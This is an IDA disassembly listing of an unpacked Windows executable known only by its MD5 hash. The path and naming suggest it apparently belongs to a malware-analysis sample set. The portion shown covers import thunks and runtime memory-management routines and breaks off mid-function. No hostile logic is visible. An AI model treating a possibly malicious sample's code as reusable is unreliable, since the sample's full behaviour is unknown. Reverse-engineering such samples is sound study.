;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 46868D185572E9C3DC663F962D4858EF
; File Name : u:\work\46868d185572e9c3dc663f962d4858ef_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
CODE segment para public 'DATA' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401000 proc near ; CODE XREF: sub_402D70+39�p
; sub_402D70+54�p
jmp ds:dword_4060C8
sub_401000 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401008 proc near ; CODE XREF: sub_40276C+14�p
; sub_402788+16�p ...
jmp ds:dword_4060C4
sub_401008 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401010 proc near ; CODE XREF: sub_402BE4-2B6�p
; CODE:00402B3C�p
; DATA XREF: ...
jmp ds:dword_4060C0
sub_401010 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401018 proc near ; CODE XREF: sub_402BE4-31E�p
; sub_402BE4-2E1�p ...
jmp ds:dword_4060BC
sub_401018 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401020 proc near ; CODE XREF: sub_402D70+3F�p
; sub_402D70+5A�p
jmp ds:dword_4060B8
sub_401020 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401028 proc near ; CODE XREF: sub_402DFC+BA�p
jmp ds:dword_4060B4
sub_401028 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401030 proc near ; CODE XREF: sub_402D70+78�p
jmp ds:dword_4060D4
sub_401030 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401038 proc near ; CODE XREF: sub_402DFC+85�p
jmp ds:dword_4060B0
sub_401038 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401040 proc near ; CODE XREF: CODE:00403197�p
jmp ds:dword_4060AC
sub_401040 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401048 proc near ; CODE XREF: sub_403068+26�p
jmp ds:dword_4060A8
sub_401048 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401050 proc near ; CODE XREF: sub_401088+A�p
jmp ds:dword_4060A4
sub_401050 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401058 proc near ; CODE XREF: CODE:loc_4031D8�p
; CODE:loc_4031E9�p
jmp ds:dword_4060A0
sub_401058 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401060 proc near ; CODE XREF: sub_402690+6B�p
jmp ds:dword_4060E4
sub_401060 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401068 proc near ; CODE XREF: sub_402690+22�p
jmp ds:dword_4060E0
sub_401068 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401070 proc near ; CODE XREF: sub_402690+55�p
jmp ds:dword_4060DC
sub_401070 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401078 proc near ; CODE XREF: CODE:loc_4031F8�p
jmp ds:dword_40609C
sub_401078 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401080 proc near ; CODE XREF: CODE:004031AB�p
; CODE:004031BC�p
jmp ds:dword_406098
sub_401080 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401088 proc near ; CODE XREF: CODE:004031A1�p
var_1C = word ptr -1Ch
var_18 = word ptr -18h
push ebx
add esp, 0FFFFFFBCh
mov ebx, 0Ah
push esp
call sub_401050 ; GetStartupInfoA
test byte ptr [esp+48h+var_1C], 1
jz short loc_4010A3
movzx ebx, [esp+48h+var_18]
loc_4010A3: ; CODE XREF: sub_401088+14�j
mov eax, ebx
add esp, 44h
pop ebx
retn
sub_401088 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010AC proc near ; CODE XREF: sub_4010EC+13�p
; sub_401778+53�p
jmp ds:dword_406094
sub_4010AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B4 proc near ; CODE XREF: sub_40183C+3F�p
; sub_40183C+9D�p
jmp ds:dword_406090
sub_4010B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010BC proc near ; CODE XREF: sub_401290+2F�p
; sub_4012F4+1E�p ...
jmp ds:dword_40608C
sub_4010BC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010C4 proc near ; CODE XREF: sub_401290+56�p
; sub_4012F4+69�p ...
jmp ds:dword_406088
sub_4010C4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010CC proc near ; CODE XREF: sub_401778+16�p
jmp ds:dword_406084
sub_4010CC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D4 proc near ; CODE XREF: sub_401778+29�p
; sub_40183C+2D�p ...
jmp ds:dword_406080
sub_4010D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010DC proc near ; CODE XREF: sub_401778+B0�p
; sub_40183C+C6�p ...
jmp ds:dword_40607C
sub_4010DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E4 proc near ; CODE XREF: sub_40183C+D0�p
jmp ds:dword_406078
sub_4010E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4010EC proc near ; CODE XREF: sub_401144+6�p
push ebx
push esi
mov esi, offset dword_4055D0
cmp dword ptr [esi], 0
jnz short loc_401132
push 644h
push 0
call sub_4010AC ; LocalAlloc
mov ecx, eax
test ecx, ecx
jnz short loc_40110F
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40110F: ; CODE XREF: sub_4010EC+1C�j
mov eax, ds:dword_4055CC
mov [ecx], eax
mov ds:dword_4055CC, ecx
xor edx, edx
loc_40111E: ; CODE XREF: sub_4010EC+44�j
mov eax, edx
add eax, eax
lea eax, [ecx+eax*8+4]
mov ebx, [esi]
mov [eax], ebx
mov [esi], eax
inc edx
cmp edx, 64h
jnz short loc_40111E
loc_401132: ; CODE XREF: sub_4010EC+A�j
mov eax, [esi]
mov edx, [eax]
mov [esi], edx
pop esi
pop ebx
retn
sub_4010EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40113C proc near ; CODE XREF: sub_401778+33�p
; sub_401778+3D�p ...
mov [eax], eax
mov [eax+4], eax
retn
sub_40113C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401144 proc near ; CODE XREF: sub_40118C+5D�p
; sub_4011FC+73�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
call sub_4010EC
test eax, eax
jnz short loc_401158
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401158: ; CODE XREF: sub_401144+D�j
mov edx, [esi]
mov [eax+8], edx
mov edx, [esi+4]
mov [eax+0Ch], edx
mov edx, [ebx]
mov [eax], edx
mov [eax+4], ebx
mov [edx+4], eax
mov [ebx], eax
mov al, 1
pop esi
pop ebx
retn
sub_401144 endp
; =============== S U B R O U T I N E =======================================
sub_401174 proc near ; CODE XREF: sub_40118C+2C�p
; sub_40118C+48�p ...
mov edx, [eax+4]
mov ecx, [eax]
mov [edx], ecx
mov [ecx+4], edx
mov edx, ds:dword_4055D0
mov [eax], edx
mov ds:dword_4055D0, eax
retn
sub_401174 endp
; =============== S U B R O U T I N E =======================================
sub_40118C proc near ; CODE XREF: sub_401538+6C�p
; sub_4015C8+62�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov esi, ecx
mov [esp+14h+var_14], edx
mov ebp, eax
mov ebx, [ebp+0]
mov eax, [esp+14h+var_14]
mov edx, [eax]
mov [esi], edx
mov edx, [eax+4]
mov [esi+4], edx
loc_4011A8: ; CODE XREF: sub_40118C+57�j
mov edi, [ebx]
mov eax, [esi]
mov edx, [ebx+8]
add edx, [ebx+0Ch]
cmp eax, edx
jnz short loc_4011CA
mov eax, ebx
call sub_401174
mov eax, [ebx+8]
mov [esi], eax
mov eax, [ebx+0Ch]
add [esi+4], eax
jmp short loc_4011DF
; ---------------------------------------------------------------------------
loc_4011CA: ; CODE XREF: sub_40118C+28�j
add eax, [esi+4]
cmp eax, [ebx+8]
jnz short loc_4011DF
mov eax, ebx
call sub_401174
mov eax, [ebx+0Ch]
add [esi+4], eax
loc_4011DF: ; CODE XREF: sub_40118C+3C�j
; sub_40118C+44�j
mov ebx, edi
cmp ebp, ebx
jnz short loc_4011A8
mov edx, esi
mov eax, ebp
call sub_401144
test al, al
jnz short loc_4011F6
xor eax, eax
mov [esi], eax
loc_4011F6: ; CODE XREF: sub_40118C+64�j
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40118C endp
; =============== S U B R O U T I N E =======================================
sub_4011FC proc near ; CODE XREF: sub_4016EC+7A�p
; sub_401AD4+99�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebx, eax
mov edi, ebx
loc_401207: ; CODE XREF: sub_4011FC+88�j
mov esi, [edx]
mov eax, [ebx+8]
cmp esi, eax
jb short loc_401280
mov ecx, esi
add ecx, [edx+4]
mov ebp, eax
add ebp, [ebx+0Ch]
cmp ecx, ebp
ja short loc_401280
cmp esi, eax
jnz short loc_40123D
mov eax, [edx+4]
add [ebx+8], eax
mov eax, [edx+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_40127C
mov eax, ebx
call sub_401174
jmp short loc_40127C
; ---------------------------------------------------------------------------
loc_40123D: ; CODE XREF: sub_4011FC+24�j
mov ecx, esi
mov edi, [edx+4]
add ecx, edi
mov ebp, eax
add ebp, [ebx+0Ch]
cmp ecx, ebp
jnz short loc_401252
sub [ebx+0Ch], edi
jmp short loc_40127C
; ---------------------------------------------------------------------------
loc_401252: ; CODE XREF: sub_4011FC+4F�j
mov ecx, [edx]
add ecx, [edx+4]
mov [esp+18h+var_18], ecx
mov edi, [ebx+8]
add edi, [ebx+0Ch]
sub edi, ecx
mov [esp+18h+var_14], edi
sub esi, eax
mov [ebx+0Ch], esi
mov edx, esp
mov eax, ebx
call sub_401144
test al, al
jnz short loc_40127C
xor eax, eax
jmp short loc_401288
; ---------------------------------------------------------------------------
loc_40127C: ; CODE XREF: sub_4011FC+36�j
; sub_4011FC+3F�j ...
mov al, 1
jmp short loc_401288
; ---------------------------------------------------------------------------
loc_401280: ; CODE XREF: sub_4011FC+12�j
; sub_4011FC+20�j
mov ebx, [ebx]
cmp edi, ebx
jnz short loc_401207
xor eax, eax
loc_401288: ; CODE XREF: sub_4011FC+7E�j
; sub_4011FC+82�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4011FC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401290 proc near ; CODE XREF: sub_401538+5C�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
cmp esi, 100000h
jge short loc_4012A6
mov esi, 100000h
jmp short loc_4012B2
; ---------------------------------------------------------------------------
loc_4012A6: ; CODE XREF: sub_401290+D�j
add esi, 0FFFFh
and esi, 0FFFF0000h
loc_4012B2: ; CODE XREF: sub_401290+14�j
mov [ebx+4], esi
push 1
push 2000h
push esi
push 0
call sub_4010BC ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jz short loc_4012EF
mov edx, ebx
mov eax, offset dword_4055D4
call sub_401144
test al, al
jnz short loc_4012EF
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010C4 ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_4012EF: ; CODE XREF: sub_401290+3A�j
; sub_401290+4A�j
pop edi
pop esi
pop ebx
retn
sub_401290 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4012F4 proc near ; CODE XREF: sub_4015C8+4C�p
; sub_4015C8+93�p
push ebx
push esi
push edi
push ebp
mov ebx, ecx
mov esi, edx
mov ebp, eax
mov dword ptr [ebx+4], 100000h
push 4
push 2000h
push 100000h
push ebp
call sub_4010BC ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jnz short loc_40133E
add esi, 0FFFFh
and esi, 0FFFF0000h
mov [ebx+4], esi
push 4
push 2000h
push esi
push ebp
call sub_4010BC ; VirtualAlloc
mov [ebx], eax
loc_40133E: ; CODE XREF: sub_4012F4+29�j
cmp dword ptr [ebx], 0
jz short loc_401366
mov edx, ebx
mov eax, offset dword_4055D4
call sub_401144
test al, al
jnz short loc_401366
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_4010C4 ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_401366: ; CODE XREF: sub_4012F4+4D�j
; sub_4012F4+5D�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4012F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40136C proc near ; CODE XREF: sub_401538+7E�p
; sub_4015C8+7A�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_20], ecx
mov [esp+24h+var_24], edx
mov [esp+24h+var_1C], 0FFFFFFFFh
xor edx, edx
mov [esp+24h+var_18], edx
mov ebp, eax
mov eax, [esp+24h+var_24]
add eax, ebp
mov [esp+24h+var_14], eax
mov ebx, ds:dword_4055D4
jmp short loc_4013EC
; ---------------------------------------------------------------------------
loc_40139B: ; CODE XREF: sub_40136C+86�j
mov edi, [ebx]
mov esi, [ebx+8]
cmp ebp, esi
ja short loc_4013EA
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_14]
ja short loc_4013EA
cmp esi, [esp+24h+var_1C]
jnb short loc_4013B9
mov [esp+24h+var_1C], esi
loc_4013B9: ; CODE XREF: sub_40136C+47�j
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_18]
jbe short loc_4013C8
mov [esp+24h+var_18], eax
loc_4013C8: ; CODE XREF: sub_40136C+56�j
push 8000h
push 0
push esi
call sub_4010C4 ; VirtualFree
test eax, eax
jnz short loc_4013E3
mov ds:dword_4055B0, 1
loc_4013E3: ; CODE XREF: sub_40136C+6B�j
mov eax, ebx
call sub_401174
loc_4013EA: ; CODE XREF: sub_40136C+36�j
; sub_40136C+41�j
mov ebx, edi
loc_4013EC: ; CODE XREF: sub_40136C+2D�j
cmp ebx, offset dword_4055D4
jnz short loc_40139B
mov eax, [esp+24h+var_20]
xor edx, edx
mov [eax], edx
cmp [esp+24h+var_18], 0
jz short loc_40141C
mov eax, [esp+24h+var_20]
mov edx, [esp+24h+var_1C]
mov [eax], edx
mov eax, [esp+24h+var_18]
sub eax, [esp+24h+var_1C]
mov edx, [esp+24h+var_20]
mov [edx+4], eax
loc_40141C: ; CODE XREF: sub_40136C+95�j
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40136C endp
; =============== S U B R O U T I N E =======================================
sub_401424 proc near ; CODE XREF: sub_401538+2D�p
; sub_4015C8+E6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov [esp+1Ch+var_18], ecx
mov [esp+1Ch+var_1C], edx
mov edx, eax
mov ebp, edx
and ebp, 0FFFFF000h
add edx, [esp+1Ch+var_1C]
add edx, 0FFFh
and edx, 0FFFFF000h
mov [esp+1Ch+var_14], edx
mov eax, [esp+1Ch+var_18]
mov [eax], ebp
mov eax, [esp+1Ch+var_14]
sub eax, ebp
mov edx, [esp+1Ch+var_18]
mov [edx+4], eax
mov esi, ds:dword_4055D4
jmp short loc_4014A6
; ---------------------------------------------------------------------------
loc_40146A: ; CODE XREF: sub_401424+88�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebp, ebx
jbe short loc_401478
mov ebx, ebp
loc_401478: ; CODE XREF: sub_401424+50�j
cmp edi, [esp+1Ch+var_14]
jbe short loc_401482
mov edi, [esp+1Ch+var_14]
loc_401482: ; CODE XREF: sub_401424+58�j
cmp edi, ebx
jbe short loc_4014A4
push 4
push 1000h
sub edi, ebx
push edi
push ebx
call sub_4010BC ; VirtualAlloc
test eax, eax
jnz short loc_4014A4
mov eax, [esp+1Ch+var_18]
xor edx, edx
mov [eax], edx
jmp short loc_4014AE
; ---------------------------------------------------------------------------
loc_4014A4: ; CODE XREF: sub_401424+60�j
; sub_401424+74�j
mov esi, [esi]
loc_4014A6: ; CODE XREF: sub_401424+44�j
cmp esi, offset dword_4055D4
jnz short loc_40146A
loc_4014AE: ; CODE XREF: sub_401424+7E�j
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401424 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014B8 proc near ; CODE XREF: sub_4016EC+2E�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebx, eax
mov esi, ebx
add esi, 0FFFh
and esi, 0FFFFF000h
mov [esp+14h+var_14], esi
mov ebp, ebx
add ebp, edx
and ebp, 0FFFFF000h
mov eax, [esp+14h+var_14]
mov [ecx], eax
mov eax, ebp
sub eax, [esp+14h+var_14]
mov [ecx+4], eax
mov esi, ds:dword_4055D4
jmp short loc_401527
; ---------------------------------------------------------------------------
loc_4014EF: ; CODE XREF: sub_4014B8+75�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebx, [esp+14h+var_14]
jnb short loc_4014FF
mov ebx, [esp+14h+var_14]
loc_4014FF: ; CODE XREF: sub_4014B8+42�j
cmp ebp, edi
jnb short loc_401505
mov edi, ebp
loc_401505: ; CODE XREF: sub_4014B8+49�j
cmp edi, ebx
jbe short loc_401525
push 4000h
sub edi, ebx
push edi
push ebx
call sub_4010C4 ; VirtualFree
test eax, eax
jnz short loc_401525
mov ds:dword_4055B0, 2
loc_401525: ; CODE XREF: sub_4014B8+4F�j
; sub_4014B8+61�j
mov esi, [esi]
loc_401527: ; CODE XREF: sub_4014B8+35�j
cmp esi, offset dword_4055D4
jnz short loc_4014EF
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4014B8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401538 proc near ; CODE XREF: sub_401CE4+B�p
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
mov edi, eax
mov ebp, offset dword_4055E4
add edi, 3FFFh
and edi, 0FFFFC000h
loc_401554: ; CODE XREF: sub_401538+75�j
mov ebx, [ebp+0]
jmp short loc_40158C
; ---------------------------------------------------------------------------
loc_401559: ; CODE XREF: sub_401538+56�j
cmp edi, [ebx+0Ch]
jg short loc_40158A
mov ecx, esi
mov edx, edi
mov eax, [ebx+8]
call sub_401424
cmp dword ptr [esi], 0
jz short loc_4015BF
mov eax, [esi+4]
add [ebx+8], eax
mov eax, [esi+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_4015BF
mov eax, ebx
call sub_401174
jmp short loc_4015BF
; ---------------------------------------------------------------------------
loc_40158A: ; CODE XREF: sub_401538+24�j
mov ebx, [ebx]
loc_40158C: ; CODE XREF: sub_401538+1F�j
cmp ebx, ebp
jnz short loc_401559
mov edx, esi
mov eax, edi
call sub_401290
cmp dword ptr [esi], 0
jz short loc_4015BF
mov ecx, esp
mov edx, esi
mov eax, ebp
call sub_40118C
cmp [esp+18h+var_18], 0
jnz short loc_401554
mov ecx, esp
mov edx, [esi+4]
mov eax, [esi]
call sub_40136C
xor eax, eax
mov [esi], eax
loc_4015BF: ; CODE XREF: sub_401538+35�j
; sub_401538+47�j ...
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401538 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4015C8 proc near ; CODE XREF: sub_401D10+10�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_24], ecx
mov edi, edx
mov esi, eax
mov ebp, offset dword_4055E4
add edi, 3FFFh
and edi, 0FFFFC000h
loc_4015E7: ; CODE XREF: sub_4015C8+6C�j
; sub_4015C8+B3�j
mov ebx, [ebp+0]
jmp short loc_4015EE
; ---------------------------------------------------------------------------
loc_4015EC: ; CODE XREF: sub_4015C8+2D�j
mov ebx, [ebx]
loc_4015EE: ; CODE XREF: sub_4015C8+22�j
cmp ebx, ebp
jz short loc_4015F7
cmp esi, [ebx+8]
jnz short loc_4015EC
loc_4015F7: ; CODE XREF: sub_4015C8+28�j
cmp esi, [ebx+8]
jnz short loc_401653
cmp edi, [ebx+0Ch]
jle loc_40169B
lea ecx, [esp+24h+var_20]
mov edx, edi
sub edx, [ebx+0Ch]
mov eax, [ebx+8]
add eax, [ebx+0Ch]
call sub_4012F4
cmp [esp+24h+var_20], 0
jz short loc_401653
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_40118C
cmp [esp+24h+var_18], 0
jnz short loc_4015E7
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
call sub_40136C
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp loc_4016E3
; ---------------------------------------------------------------------------
loc_401653: ; CODE XREF: sub_4015C8+32�j
; sub_4015C8+56�j
lea ecx, [esp+24h+var_20]
mov edx, edi
mov eax, esi
call sub_4012F4
cmp [esp+24h+var_20], 0
jz short loc_40169B
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_40118C
cmp [esp+24h+var_18], 0
jnz loc_4015E7
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
call sub_40136C
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp short loc_4016E3
; ---------------------------------------------------------------------------
loc_40169B: ; CODE XREF: sub_4015C8+37�j
; sub_4015C8+9D�j
mov ebp, [ebx+8]
cmp esi, ebp
jnz short loc_4016DC
cmp edi, [ebx+0Ch]
jg short loc_4016DC
mov ecx, [esp+24h+var_24]
mov edx, edi
mov eax, ebp
call sub_401424
mov eax, [esp+24h+var_24]
cmp dword ptr [eax], 0
jz short loc_4016E3
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
add [ebx+8], eax
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_4016E3
mov eax, ebx
call sub_401174
jmp short loc_4016E3
; ---------------------------------------------------------------------------
loc_4016DC: ; CODE XREF: sub_4015C8+D8�j
; sub_4015C8+DD�j
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
loc_4016E3: ; CODE XREF: sub_4015C8+86�j
; sub_4015C8+D1�j ...
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4015C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4016EC proc near ; CODE XREF: sub_401AD4+4E�p
; sub_401AD4+61�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, ecx
mov [esp+20h+var_20], edx
lea ebx, [eax+3FFFh]
and ebx, 0FFFFC000h
mov esi, [esp+20h+var_20]
add esi, eax
and esi, 0FFFFC000h
cmp ebx, esi
jnb short loc_40176D
mov ecx, edi
mov edx, esi
sub edx, ebx
mov eax, ebx
call sub_4014B8
lea ecx, [esp+20h+var_1C]
mov edx, edi
mov eax, offset dword_4055E4
call sub_40118C
mov ebx, [esp+20h+var_1C]
test ebx, ebx
jz short loc_401756
lea ecx, [esp+20h+var_14]
mov edx, [esp+20h+var_18]
mov eax, ebx
call sub_40136C
mov eax, [esp+20h+var_14]
mov [esp+20h+var_1C], eax
mov eax, [esp+20h+var_10]
mov [esp+20h+var_18], eax
loc_401756: ; CODE XREF: sub_4016EC+49�j
cmp [esp+20h+var_1C], 0
jz short loc_401771
lea edx, [esp+20h+var_1C]
mov eax, offset dword_4055E4
call sub_4011FC
jmp short loc_401771
; ---------------------------------------------------------------------------
loc_40176D: ; CODE XREF: sub_4016EC+24�j
xor eax, eax
mov [edi], eax
loc_401771: ; CODE XREF: sub_4016EC+6F�j
; sub_4016EC+7F�j
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_4016EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401778 proc near ; CODE XREF: sub_401E64+14�p
; sub_401FF4+19�p ...
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00402988 SIZE 00000036 BYTES
push ebp
mov ebp, esp
xor edx, edx
push ebp
push offset loc_40182E
push dword ptr fs:[edx]
mov fs:[edx], esp
push offset dword_4055B4
call sub_4010CC ; InitializeCriticalSection
cmp ds:byte_405035, 0
jz short loc_4017A6
push offset dword_4055B4
call sub_4010D4 ; RtlEnterCriticalSection
loc_4017A6: ; CODE XREF: sub_401778+22�j
mov eax, offset dword_4055D4
call sub_40113C
mov eax, offset dword_4055E4
call sub_40113C
mov eax, offset dword_405610
call sub_40113C
push 0FF8h
push 0
call sub_4010AC ; LocalAlloc
mov ds:dword_40560C, eax
cmp ds:dword_40560C, 0
jz short loc_40180D
mov eax, 3
loc_4017E3: ; CODE XREF: sub_401778+7D�j
mov edx, ds:dword_40560C
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
inc eax
cmp eax, 401h
jnz short loc_4017E3
mov eax, offset dword_4055F4
mov [eax+4], eax
mov [eax], eax
mov ds:dword_405600, eax
mov ds:byte_4055AC, 1
loc_40180D: ; CODE XREF: sub_401778+64�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401835
loc_40181A: ; CODE XREF: sub_401778+BB�j
cmp ds:byte_405035, 0
jz short locret_40182D
push offset dword_4055B4
call sub_4010DC ; RtlLeaveCriticalSection
locret_40182D: ; CODE XREF: sub_401778+A9�j
retn
; ---------------------------------------------------------------------------
loc_40182E: ; DATA XREF: sub_401778+6�o
jmp loc_402988
; ---------------------------------------------------------------------------
jmp short loc_40181A
; ---------------------------------------------------------------------------
loc_401835: ; DATA XREF: sub_401778+9D�o
mov al, ds:byte_4055AC
pop ebp
retn
sub_401778 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40183C proc near ; CODE XREF: CODE:00403113�p
push ebp
mov ebp, esp
push ebx
cmp ds:byte_4055AC, 0
jz loc_401919
xor edx, edx
push ebp
push offset loc_401912
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_405035, 0
jz short loc_40186E
push offset dword_4055B4
call sub_4010D4 ; RtlEnterCriticalSection
loc_40186E: ; CODE XREF: sub_40183C+26�j
mov ds:byte_4055AC, 0
mov eax, ds:dword_40560C
push eax
call sub_4010B4 ; LocalFree
xor eax, eax
mov ds:dword_40560C, eax
mov ebx, ds:dword_4055D4
jmp short loc_4018A1
; ---------------------------------------------------------------------------
loc_40188F: ; CODE XREF: sub_40183C+6B�j
push 8000h
push 0
mov eax, [ebx+8]
push eax
call sub_4010C4 ; VirtualFree
mov ebx, [ebx]
loc_4018A1: ; CODE XREF: sub_40183C+51�j
cmp ebx, offset dword_4055D4
jnz short loc_40188F
mov eax, offset dword_4055D4
call sub_40113C
mov eax, offset dword_4055E4
